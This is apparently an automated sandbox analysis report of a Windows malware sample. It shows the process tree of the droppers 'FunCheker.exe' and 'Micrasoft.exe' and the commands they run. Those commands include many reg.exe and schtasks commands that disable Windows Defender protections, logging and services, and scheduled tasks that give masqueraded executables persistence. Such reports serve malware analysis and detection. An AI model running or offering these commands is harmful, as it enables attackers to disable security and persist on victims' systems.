PID 872 wrote to memory of 3936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 872 wrote to memory of 1624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 872 wrote to memory of 1624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 872 wrote to memory of 4960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 872 wrote to memory of 4960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 872 wrote to memory of 3784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 872 wrote to memory of 3784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 872 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 872 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 872 wrote to memory of 1324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 4636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 4636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\FunCheker.exe

"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"

C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe

"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe

"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Cookies\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\Cookies\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Cookies\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eTV455KIx4.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Zlmto9DLwM.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\system32\timeout.exe

timeout /t 6 /nobreak

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NfeiSKMyn5.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\system32\timeout.exe

timeout /t 6 /nobreak

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Pbgl9PPr7s.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\system32\timeout.exe

timeout /t 6 /nobreak

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nfin2KLgOh.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QwDZd8tkMK.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CL2HVdYORd.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Mw1PlbJmoj.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc54b846f8,0x7ffc54b84708,0x7ffc54b84718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1912 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:1

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\gZmmY05In2.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3580 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3580 /prefetch:8

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nAABNdhKLs.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vF7CrwxjwX.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:1

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4248 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5760 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\mQXsfud8LV.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5320 /prefetch:8

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\bhowVEGEG8.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LZh5ueQJla.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eR3ydISl4k.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iqKdioc4MG.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8RIE4o2SCx.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Admin\AppData\Local\Temp\FunCheker.exe

"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\45aGjaybPu.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe

"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

